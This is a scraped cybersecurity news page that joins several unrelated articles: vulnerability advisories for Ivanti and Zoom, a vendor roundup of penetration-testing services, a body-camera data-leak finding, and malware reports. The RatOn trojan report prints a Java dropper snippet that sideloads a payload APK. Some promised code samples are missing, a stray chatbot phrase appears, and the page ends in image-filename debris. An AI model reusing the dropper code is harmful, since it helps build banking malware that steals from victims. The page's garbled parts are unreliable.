Ivanti has released security updates to address two high-severity vulnerabilities in its Endpoint Manager (EPM) software that could allow remote code execution. The vulnerabilities, tracked as CVE-2025-9712 and CVE-2025-9872, affect multiple versions of the product.
The company has stated that it is not aware of any active exploitation of these flaws in the wild at the time of disclosure.
Both CVE-2025-9712 and CVE-2025-9872 have been assigned a CVSS score of 8.8 out of 10.0, categorizing them as high-severity. The root cause of both flaws is an insufficient filename validation weakness, cataloged as CWE-434 (Unrestricted Upload of File with Dangerous Type).
This type of vulnerability can allow an attacker to upload a file with a malicious or unexpected type, which can then be executed on the target system.
For a successful attack, a remote, unauthenticated threat actor would need to trick a user into interacting with a specially crafted file. This user interaction is a critical prerequisite for exploitation.
If an attacker successfully exploits either vulnerability, they could achieve remote code execution (RCE) on the affected system, granting them the ability to compromise the confidentiality, integrity, and availability of the system.
The CVSS vector, AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, confirms that the attack can be launched remotely over a network, requires low complexity, needs no privileges, but depends on user interaction.
Affected Versions and Patches
The vulnerabilities impact Ivanti Endpoint Manager versions 2022 SU8 Security Update 1 and prior, as well as 2024 SU3 and prior versions. Ivanti has made patches available to resolve these issues.
Administrators are strongly advised to upgrade to the following secure versions: Ivanti Endpoint Manager 2022 SU8 Security Update 2 and Ivanti Endpoint Manager 2024 SU3 Security Update 1. The security updates can be accessed through the Ivanti License System portal.
Certainly, here is a table detailing the affected and patched versions of Ivanti Endpoint Manager.
Product Name
Affected Version(s)
Patched Version(s)
Ivanti Endpoint Manager
2024 SU3 and prior
2024 SU3 Security Update 1
Ivanti Endpoint Manager
2022 SU8 Security Update 1 and prior
2022 SU8 Security Update 2
Adding a layer of urgency, Ivanti has reminded customers that the 2022 product branch is scheduled to reach its End of Life (EOL) at the end of October 2025.
Organizations still using this branch are encouraged not only to apply the immediate security fix but also to plan a migration to a fully supported version to continue receiving security updates and technical support.
Ivanti has confirmed that these vulnerabilities were reported through its responsible disclosure program. The company credited a researcher, identified as “06fe5fd2bc53027c4a3b7e395af0b850e7b8a044,” working with Trend Micro’s Zero Day Initiative for discovering and reporting both flaws. Because the issues were disclosed responsibly, Ivanti has not found any evidence of active exploitation or compromise.
Consequently, there are no specific indicators of compromise (IoCs) available for administrators to search for. Despite the absence of known attacks, administrators are urged to apply the patches promptly, as threat actors often reverse-engineer security updates to develop exploits for unpatched systems.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Penetration Testing as a Service (PTaaS) is a modern evolution of traditional pentesting that combines the speed and efficiency of a platform with the skill of human ethical hackers.
Unlike the time-consuming, point-in-time nature of traditional engagements, PTaaS offers a continuous, on-demand, and real-time approach to finding and managing vulnerabilities.
In 2025, with rapidly expanding attack surfaces and agile development cycles, PTaaS is an essential part of a proactive security strategy, enabling organizations to “shift-left” security and remediate vulnerabilities faster.
Why We Chose It
The digital landscape in 2025 is more dynamic than ever, with new code, microservices, and APIs being deployed continuously. Traditional, annual pentests simply can’t keep up.
The companies on this list have innovated by creating a model that provides real-time visibility, streamlined collaboration, and a continuous security loop.
This allows teams to prioritize and fix vulnerabilities as they are discovered, a fundamental shift from reactive to proactive security.
We also chose these companies based on their ability to combine the best of both worlds: the scale of automation and the critical human context required to find complex, chained exploits and logical flaws that automated scanners miss.
How We Chose It
Our selection of the top PTaaS providers for 2025 is based on a few key criteria:
Experience & Expertise (E-E): We looked for companies with a proven track record of delivering high-quality, human-led penetration tests, supported by a team of elite security experts.
Authoritativeness & Trustworthiness (A-T): We considered their market leadership, their reputation for delivering zero false positives, and the trust they have earned from enterprise clients and the broader security community.
Feature-Richness: We assessed the comprehensiveness of their platforms, focusing on features like real-time reporting, seamless integrations with development and vulnerability management tools, and support for a continuous testing model.
Rapid7 is a leader in PTaaS, leveraging its Managed Penetration Testing service and the Vector Command Advanced platform to deliver continuous security.
By combining a team of expert pentesters with a platform that provides real-time visibility into findings, Rapid7 helps organizations move from point-in-time assessments to continuous validation.
Its platform integrates seamlessly with other security tools, enabling security teams to prioritize and fix vulnerabilities more efficiently.
Why You Want to Buy It:
Rapid7’s blend of expert-led testing and a unified platform simplifies security management, making it easy to track, manage, and remediate vulnerabilities in real time.
The platform’s ability to contextualize risks with threat intelligence is a major differentiator.
Feature
Yes/No
Specification
Human-Led Testing
Yes
Team of expert pentesters.
Platform/PTaaS
Yes
Vector Command Advanced platform for real-time visibility.
Crowdsourced Model
No
Uses an in-house team.
Continuous Testing
Yes
Managed service for ongoing validation.
Best For: Enterprises that need a comprehensive, platform-driven PTaaS solution with a strong focus on compliance and continuous security validation.
Cobalt is widely regarded as a pioneer in the PTaaS space. Its platform connects companies with a highly vetted community of ethical hackers, providing a model that is both scalable and cost-effective.
The Cobalt Platform streamlines the entire pentest lifecycle, from scoping and test execution to real-time reporting and fix validation. The intuitive dashboard and seamless integrations make it a favorite for agile, developer-centric teams.
Why You Want to Buy It:
Cobalt’s platform and crowdsourced model offer unparalleled speed and flexibility. You can launch a test in as little as 24 hours and get real-time results, accelerating the remediation process and helping you keep pace with development.
Feature
Yes/No
Specification
Human-Led Testing
Yes
A vetted community of ethical hackers (Cobalt Core).
Platform/PTaaS
Yes
The Cobalt platform for end-to-end management.
Crowdsourced Model
Yes
Leverages a global community of specialists.
Continuous Testing
Yes
Supports continuous and on-demand testing.
Best For: Companies with fast-paced development cycles that need on-demand, flexible, and continuous security testing.
CrowdStrike, a leader in endpoint security, provides a robust PTaaS offering that is deeply integrated with its Falcon platform.
By leveraging its unparalleled threat intelligence, CrowdStrike’s team of elite pentesters can simulate the tactics, techniques, and procedures (TTPs) of real-world adversaries.
The platform provides a unified view of security posture and vulnerabilities, enabling security teams to validate their defenses against the latest attack methods.
Why You Want to Buy It:
CrowdStrike’s PTaaS is unique because it’s informed by real-time threat data from the Falcon platform. This ensures that the test isn’t just a checklist exercise but a realistic simulation of a targeted attack.
Feature
Yes/No
Specification
Human-Led Testing
Yes
A team of elite offensive security professionals.
Platform/PTaaS
Yes
Integrates with the CrowdStrike Falcon platform.
Crowdsourced Model
No
Uses an in-house team.
Continuous Testing
Yes
Services are designed for continuous validation.
Best For: Organizations that want a penetration test driven by elite threat intelligence, with the goal of validating their security controls against active threats.
Bugcrowd, a pioneer in crowdsourced security, offers a PTaaS solution that leverages its massive community of ethical hackers.
Its platform provides a flexible and scalable way to conduct penetration tests, bug bounty programs, and vulnerability disclosure programs.
The platform’s real-time dashboard and robust workflow tools streamline the entire process, from finding a vulnerability to validating its fix.
Why You Want to Buy It:
Bugcrowd’s crowdsourced model provides access to a diverse set of skills and a “follow-the-sun” approach to testing.
This enables you to get a comprehensive assessment of your attack surface from a wide range of perspectives, often leading to the discovery of vulnerabilities that might be missed by a single team.
Feature
Yes/No
Specification
Human-Led Testing
Yes
A vast community of vetted researchers.
Platform/PTaaS
Yes
Provides a platform for managing tests.
Crowdsourced Model
Yes
Pioneer in crowdsourced security.
Continuous Testing
Yes
Supports continuous testing and bug bounty programs.
Best For: Companies that want to leverage the power of a global community of ethical hackers for both formal pentests and continuous bug bounty programs.
HackerOne, best known for its world-leading bug bounty platform, has successfully extended its model to include managed PTaaS. Its platform provides a seamless interface for managing engagements with a community of vetted ethical hackers.
HackerOne’s PTaaS solution offers a more structured, project-based approach compared to a bug bounty, with clear deliverables and reporting, while still maintaining the flexibility and scale of its crowdsourced community.
Why You Want to Buy It:
HackerOne’s PTaaS is a powerful blend of formal testing and crowdsourced intelligence. It offers a structured and predictable engagement while giving you access to an immense talent pool, ensuring high-quality results.
Feature
Yes/No
Specification
Human-Led Testing
Yes
Access to a vast community of ethical hackers.
Platform/PTaaS
Yes
A platform for managing managed pentests and bug bounties.
Crowdsourced Model
Yes
The world’s largest bug bounty platform.
Continuous Testing
Yes
Supports continuous testing and managed bug bounties.
Best For: Organizations that want to use a single platform to manage both formal penetration tests and ongoing bug bounty programs.
Synack has a unique PTaaS model that combines a private, curated community of elite hackers (the Synack Red Team) with an advanced AI-powered platform.
The platform’s agentic AI, named Sara, automates reconnaissance and vulnerability discovery, which allows human testers to focus on finding and exploiting the most complex vulnerabilities.
This hybrid intelligence approach provides comprehensive coverage and a deeper level of testing.
Why You Want to Buy It:
Synack’s model is a glimpse into the future of security testing.
By pairing a trusted community with AI-powered automation, they deliver a highly efficient and effective test that is constantly learning and adapting, providing a superior level of security assurance.
Feature
Yes/No
Specification
Human-Led Testing
Yes
The elite Synack Red Team.
Platform/PTaaS
Yes
An AI-powered platform for reconnaissance and management.
Crowdsourced Model
Yes
A curated, private community.
Continuous Testing
Yes
Active offense with continuous asset discovery.
Best For: Security-conscious organizations that need a high-end, scalable PTaaS solution that blends automation with elite, human-led testing.
Secureworks provides threat intelligence-driven PTaaS that is backed by its Counter Threat Unit (CTU) research team. This ensures that every test is a realistic simulation of current and emerging threats.
The company’s PTaaS model allows for a continuous, strategic approach to security validation, with findings and remediation guidance delivered through a platform that simplifies reporting and collaboration.
Why You Want to Buy It:
Secureworks’s unique access to threat intelligence ensures that your pentest will not be a static exercise but a dynamic one, emulating the TTPs of active attackers.
This provides invaluable insight into your organization’s resilience against modern threats.
Feature
Yes/No
Specification
Human-Led Testing
Yes
A team of certified pentesters.
Platform/PTaaS
Yes
Findings and reporting managed via platform.
Crowdsourced Model
No
In-house team.
Continuous Testing
Yes
Provides continuous security validation.
Best For: Companies that want a penetration test that is directly informed by real-world threat intelligence and backed by a highly respected research team.
NetSPI is a top-tier offensive security firm with a strong PTaaS platform. Its platform is designed to streamline the entire penetration testing lifecycle, from scoping to remediation.
NetSPI’s PTaaS platform provides a single interface for clients to collaborate with expert pentesters, view real-time findings, and get actionable remediation advice.
The company’s deep expertise in cloud, network, and application security makes it a go-to for complex environments.
Why You Want to Buy It:
NetSPI’s combination of a powerful platform and an in-house team of 300+ security experts provides an unparalleled blend of technical depth and operational efficiency.
The platform simplifies the entire process, making it easy to manage a large-scale security program.
Feature
Yes/No
Specification
Human-Led Testing
Yes
A large, in-house team of security experts.
Platform/PTaaS
Yes
The NetSPI Platform for managing engagements.
Crowdsourced Model
No
In-house team.
Continuous Testing
Yes
Supports continuous testing and attack surface management.
Best For: Large enterprises and mid-market organizations that need to scale their penetration testing program with a single, unified platform and a highly experienced in-house team.
Bishop Fox is a pure-play offensive security firm with an elite reputation. Its PTaaS offering, Continuous Attack Surface Testing (CAST), is a managed service that combines automated attack surface monitoring with expert-led penetration testing.
The CAST service is a unique hybrid model that provides the continuous visibility of a platform with the deep, hands-on expertise of Bishop Fox’s elite hacking team.
This approach ensures that your external perimeter is constantly monitored and validated against new threats.
Why You Want to Buy It:
Bishop Fox’s PTaaS is not just a service; it’s a strategic partnership.
The company’s CAST service provides a continuous, high-fidelity view of your external attack surface, helping you find vulnerabilities before an attacker does.
Feature
Yes/No
Specification
Human-Led Testing
Yes
The elite “Fox” team of security professionals.
Platform/PTaaS
Yes
The CAST platform for continuous testing.
Crowdsourced Model
No
In-house team.
Continuous Testing
Yes
Continuous Attack Surface Testing (CAST) service.
Best For: Companies that want a high-end, managed service that combines the continuous visibility of a platform with the deep technical expertise of a top-tier offensive security firm.
Astra Security is a PTaaS provider that focuses on delivering a comprehensive and hassle-free penetration testing experience.
Its platform and team of certified experts provide a blend of automated and manual testing for a wide range of assets, including web apps, mobile apps, and APIs.
The platform’s easy-to-use interface and detailed, actionable reports make it a great choice for companies of all sizes.
Why You Want to Buy It:
Astra Security’s platform simplifies the entire pentesting process, from initial setup to remediation.
Its focus on detailed, zero-false-positive reports and actionable guidance makes it easy for internal teams to address vulnerabilities effectively.
Feature
Yes/No
Specification
Human-Led Testing
Yes
Certified and experienced security experts.
Platform/PTaaS
Yes
A platform for managing and reporting findings.
Crowdsourced Model
No
In-house team.
Continuous Testing
Yes
Continuous automated and manual pentesting.
Best For: Small and medium-sized businesses (SMBs) and organizations that need a user-friendly and comprehensive PTaaS solution for compliance and security.
In 2025, PTaaS is the definitive answer to the challenges of traditional, point-in-time penetration testing.
The best companies in this space have moved beyond simple tool-based testing, creating dynamic platforms that combine human ingenuity with the scale of technology.
For organizations that value the speed and flexibility of a crowdsourced model, Cobalt, Bugcrowd, and HackerOne are leading choices.
For enterprises that need a deeper, more strategic assessment informed by elite threat intelligence, CrowdStrike, Secureworks, and NetSPI provide unparalleled expertise.
Lastly, for companies that want a hybrid model that blends continuous monitoring with expert-led testing, Bishop Fox and Synack are at the cutting edge.
Ultimately, the right PTaaS provider will not only help you find vulnerabilities but also integrate security into your business processes, ensuring your defenses are as agile and dynamic as the threats you face.
Police-issued body cameras have become ubiquitous tools for recording law enforcement encounters, yet a recent investigation has uncovered troubling design choices in a budget-friendly system that compromise both privacy and data integrity.
The Viidure mobile application, designed to transfer video evidence from the camera’s onboard Wi-Fi hotspot to cloud servers, was found to communicate over a nonstandard TLS port, directing sensitive information to servers based in China.
This behavior raises significant concerns for departments relying on these devices to produce court-admissible evidence.
Initial traffic captures revealed that the mobile app establishes TLS connections to app-api.lufengzhe.com:9091, alongside geolocation API calls to api.map.baidu.com:443 and loc.map.baidu.com:443.
Camera (Source – Brown Fine Security)
Whois queries confirmed that the primary endpoint at 115.175.147.124 is owned by Huawei International Pte. Ltd. and originates from a Chinese network block.
The use of port 9091—uncommon for HTTPS traffic—signals an attempt to obscure routine data flows, potentially evading network-based monitoring tools.
Brown Fine Security analysts noted that the app’s reliance on improperly validated server certificates enabled a straightforward man-in-the-middle (MitM) attack.
By injecting forged certificates via a custom mitmrouter setup, researchers were able to intercept plaintext HTTP exchanges within the TLS tunnel.
Such misconfigurations not only expose metadata like IMEI numbers and usernames but also threaten the confidentiality of recorded video streams.
Mitmrouter diagram (Source – Brown Fine Security)
Beyond mere metadata, the intercepted payloads include device identifiers and application version details.
The following snippet illustrates the HTTP POST request captured during the MitM session:-
The Viidure application does not self-install malware but functions as an inadvertent exfiltration vector due to its insecure communications design.
Upon pairing with the camera’s hotspot, the app automatically initiates background data uploads without user notification.
TLS connections to the Chinese endpoint are established immediately, transmitting identifying information alongside any captured media metadata.
The use of port 9091 appears deliberate, likely to bypass conventional TLS inspection rules that focus on ports 443 and 8443.
Persistence of this behavior stems from the application’s versioning system. Every time the app checks for updates—triggered at startup and periodically during use—it reaffirms the connection to the malicious endpoint.
Without rigorous certificate validation or user consent dialogs, departmental networks may remain unaware of routine data streams exiting to unauthorized servers.
Security teams should prioritize network segmentation and deep packet inspection rules that include nonstandard ports to detect and disrupt similar data flows.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
A widespread issue with Microsoft’s anti-spam filtering service is preventing some Exchange Online and Microsoft Teams users from opening URLs, disrupting workflows across organizations.
The problem, tracked under Microsoft advisory MO1148487, remains ongoing as the company works on a permanent fix.
According to Microsoft, the issue stems from an anti-spam detection mechanism that is mistakenly flagging certain URLs as malicious.
Specifically, URLs nested within other URLs have been incorrectly identified as threats. As a result, impacted users are unable to open hyperlinks shared in Exchange Online emails or Microsoft Teams chats.
In addition to blocking link access, administrators have reported false alerts titled “A potentially malicious URL click was detected involving one user.”
Microsoft has confirmed that the URLs being flagged are safe and emphasized that the warnings are erroneous. Some email messages have also been quarantined unnecessarily, adding to the disruption for businesses relying on Exchange and Teams for communication.
The problem has led to confusion in organizations where security alerts typically trigger incident response processes. While the impact is widespread, Microsoft has assured users that the majority of issues have already been mitigated. However, residual link-access problems remain for some users as the company continues to fine-tune its anti-spam service.
Microsoft’s Response and Next Steps
In its latest update on September 9, 2025, at 08:25 AM UTC, Microsoft announced that it had identified a new subset of affected URLs and is actively addressing them alongside any leftover impacts from the initial issue. Engineers are also performing a root cause analysis to prevent recurrence.
Microsoft stated: “We’re confident that a majority of the impact has been resolved, and we’re actively addressing lingering issues. Our teams are continuing to examine the anti-spam detection systems that incorrectly flagged these URLs.”
The company has set the next official progress update for 6:00 PM UTC on September 9, 2025. Until then, customers may experience intermittent issues opening links in affected messages.
Microsoft has advised admins and users to monitor the Service Health Dashboard for updates. While the company continues to remediate, organizations are urged not to treat the current alerts as genuine threats, as the flagged URLs have been confirmed to be safe.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Cybersecurity researchers have observed the emergence of a novel Android banking trojan, RatOn in recent months that seamlessly combines remote access capabilities with NFC relay technology and Automated Transfer System (ATS) functions.
Initially detected in mid-July 2025, RatOn’s multi-stage architecture leverages a dropper application to install subsequent payloads, culminating in full device takeover and fraudulent transaction execution.
The trojan is distributed via adult-themed domains masquerading as third-party installers, targeting Czech and Slovakian users in its early campaign.
Its sophisticated design allows attackers to abuse Accessibility and Device Administrator permissions for both screen-state monitoring and automated interactions with legitimate banking applications.
Threat Fabric analysts noted that RatOn’s developers appear to have written the malware entirely from scratch, with no apparent code reuse from existing Android banking families.
Following installation, the first payload requests Accessibility service access through a WebView interface and subsequently escalates privileges to manage system settings and contacts.
Accessibility services (Source – Threat Fabric)
Once granted, these permissions enable the trojan to operate stealthily in the background, capturing on-screen elements via Accessibility API rather than resource-intensive screen casting.
RatOn then loads a third-stage payload—NFSkate malware—originally designed for NFC relay attacks, effectively combining card skimming with remote device control.
Threat Fabric researchers identified that the automated transfer feature focuses specifically on a Czech banking application, “George Česko.”
Upon receiving a JSON-formatted command from its control server, RatOn launches the targeted banking app and simulates user interactions, including PIN entry, to execute unauthorized transfers.
This level of precision indicates a deep understanding of the bank’s user interface, down to coordinate-based clicking when element-based search fails.
Notably, the trojan automatically confirms transaction PINs, which are harvested during earlier phishing or overlay steps, ensuring fraudulent transfers proceed without user intervention.
JavaScript code with Install button which will call function (Source – Threat Fabric)
In one observed transfer routine, the operator issues a JSON object to RatOn containing recipient details:-
RatOn’s infection chain begins with a dropper application that prompts the victim to enable third-party app installations.
Upon user approval, the dropper creates a WebView pointing to a hardcoded URL and exposes an installApk() function to the page.
When the victim taps the on-screen button, the dropper invokes installApk() to sideload the second-stage payload:-
webView.addJavascriptInterface(new Object() {
@JavascriptInterface
public void installApk() {
PackageInstaller.SessionParams params =
new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int sessionId = packageInstaller.createSession(params);
// ... install logic for payload.apk ...
packageInstaller.openSession(sessionId).write(...);
packageInstaller.openSession(sessionId).commit(...);
}
}, "DropperInterface");
After installation, the payload immediately requests Accessibility and Device Admin privileges via additional WebView dialogs.
By exploiting these elevated permissions, RatOn establishes persistence and evades detection: it intercepts permission dialogs, automatically accepts requests, and locks the device for ransom if necessary.
The combination of overlay attacks, NFC relay components, and automated transactions makes RatOn one of the most advanced banking trojans to date.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Frankfurt am Main, Germany, September 9th, 2025, CyberNewsWire The threat landscape surrounding distributed denial-of-service (DDoS) attacks intensified significantly in the first half of 2025, according to the latest Link11 European Cyber Report. Documented attacks targeting the Link11 network increased by 225% compared to the same period in 2024. The report highlights not only a marked rise in attack […]
Threat actors are abusing HTTP client tools like Axios in conjunction with Microsoft’s Direct Send feature to form a “highly efficient attack pipeline” in recent phishing campaigns, according to new findings from ReliaQuest.
“Axios user agent activity surged 241% from June to August 2025, dwarfing the 85% growth of all other flagged user agents combined,” the cybersecurity company said in a
The U.S. Department of the Treasury has unveiled a sweeping sanctions campaign against a network of cyber scam centers across Southeast Asia that collectively stole more than ten billion dollars from American victims in 2024.
These operations, often masquerading as legitimate virtual currency investment platforms, relied on sophisticated social engineering techniques to coax users into wiring funds, only to abscond with deposits once trust had been established.
From trampling human rights through forced labor to deploying high-pressure quotas for coerced operators, the network’s reach extended from isolated compounds in Myanmar to casino resorts turned criminal hubs in Cambodia.
Emerging in earnest during the pandemic’s early months, these “pig butchering” scams combined elements of romance fraud, mobile messaging exploits and fraudulent blockchain tutorials to create an illusion of credible returns.
Virtual currency investment websites were provisioned with real-time price feeds, SSL certificates and user dashboards that mimicked reputable exchanges.
Backend malware kits, often installed on coercively recruited operators’ workstations, facilitated automated spoofing of payment notifications and social account takeovers.
U.S. Treasury analysts identified code modules that intercepted SMS one-time-passcodes and injected synthetic transaction confirmations, enabling scammers to bypass two-factor authentication with alarming reliability.
As these centers scaled up, trafficked individuals—some held under threat of debt bondage—were trained to run callers through scripted dialogues that leveraged open-source intelligence to personalize pitches.
Victims were prompted to run benign-looking JavaScript snippets in their browsers to “verify wallet connectivity,” unknowingly granting scam operators access to their local session storage.
An example of this malicious script, recovered during Treasury investigations, illustrates how session tokens were harvested:-
U.S. Treasury analysts noted that this snippet bypassed common Content Security Policy (CSP) restrictions by exploiting browser extensions that allowed remote script injection through JSON-RPC interfaces.
Persistence Tactics
Within the heart of the Burma-based hub known as Yatai New City, operators deployed custom persistence mechanisms to maintain continuous control over compromised accounts and internal workstations.
A lightweight C# loader, dubbed “BeaconYatai,” was embedded within legitimate video conferencing tools to establish resilient command-and-control channels.
Once installed, BeaconYatai registered itself as a Windows service named “SvcUpdate,” automatically relaunching at boot.
The service periodically polled a disguised endpoint on the Telegram API to fetch encrypted task payloads, decrypting them using a hardcoded RSA key:-
Yatai New City Compound Layout (Source – US Treasury)
By intertwining social coercion, advanced scripting exploits and custom malware persistence, these scam centers achieved high operational uptime, making the Treasury’s sanctions a critical step toward dismantling a multimillion-dollar criminal enterprise.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Zoom released a security update addressing multiple vulnerabilities in its software, including Zoom Workplace and various clients for Windows and macOS.
The patches cover one high-severity flaw and several medium-severity issues, prompting a strong recommendation for users to update their applications immediately to safeguard against potential exploits.
The most significant vulnerability fixed in this update is a high-severity “Missing Authorization” flaw, identified as CVE-2025-49459, affecting Zoom Workplace for Windows on ARM.
This type of vulnerability could potentially allow an attacker to perform actions they are not authorized to do, leading to a compromise of the application’s security.
Flaws in Windows and macOS Clients
Several medium-severity vulnerabilities were also addressed. Two of these specifically impact Zoom Workplace Clients for Windows:
CVE-2025-58135: An “Improper Action Enforcement” vulnerability.
CVE-2025-58134: An “Incorrect Authorization” issue, which could allow users to exceed their permitted access levels.
The security bulletin also detailed other medium-severity vulnerabilities affecting a broader range of Zoom Workplace clients:
CVE-2025-49458: A “Buffer Overflow” vulnerability, which could lead to arbitrary code execution.
CVE-2025-49460: An “Argument Injection” flaw, where attackers could potentially manipulate the application’s behavior by inserting malicious arguments.
CVE-2025-49461: A “Cross-site Scripting” (XSS) vulnerability, which might allow an attacker to inject malicious scripts into web pages viewed by users.
Additionally, a “Race Condition” vulnerability (CVE-2025-58131) was patched in the Zoom Workplace VDI Plugin for macOS Universal installer for VMware Horizon. Race conditions can lead to unpredictable behavior, including denial of service or privilege escalation.
Zoom consistently advises users to update their software to the latest version to receive the most recent security fixes and improvements.
This latest batch of patches comes a month after Zoom addressed a critical vulnerability, CVE-2025-49457, an untrusted search path flaw in its Windows clients that could allow for privilege escalation.
That vulnerability, with a CVSS score of 9.6, highlighted the significant risks associated with outdated client versions, as it could enable an unauthenticated attacker to gain elevated privileges over a network.
Given the continuous discovery of security flaws, from critical to medium severity, it is crucial for both individual users and organizations to apply these updates promptly.
Delaying updates can leave systems exposed to a variety of attacks, including data exfiltration, denial of service, and full system compromise. Users can find the latest versions of the Zoom software on the company’s official website and through the application’s update channels.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
South Korean internet users are being targeted by a sophisticated phishing campaign attributed to the North Korean threat actor known as Kimsuky. The malicious emails, masquerading as official notices from the National Tax Service (NTS), inform recipients of a “September Tax Return Payment Due Notice” and urge them to click a link to view an […]
Yes
No.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
(CTU) research team. This ensures that every test is a realistic simulation of current and .webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)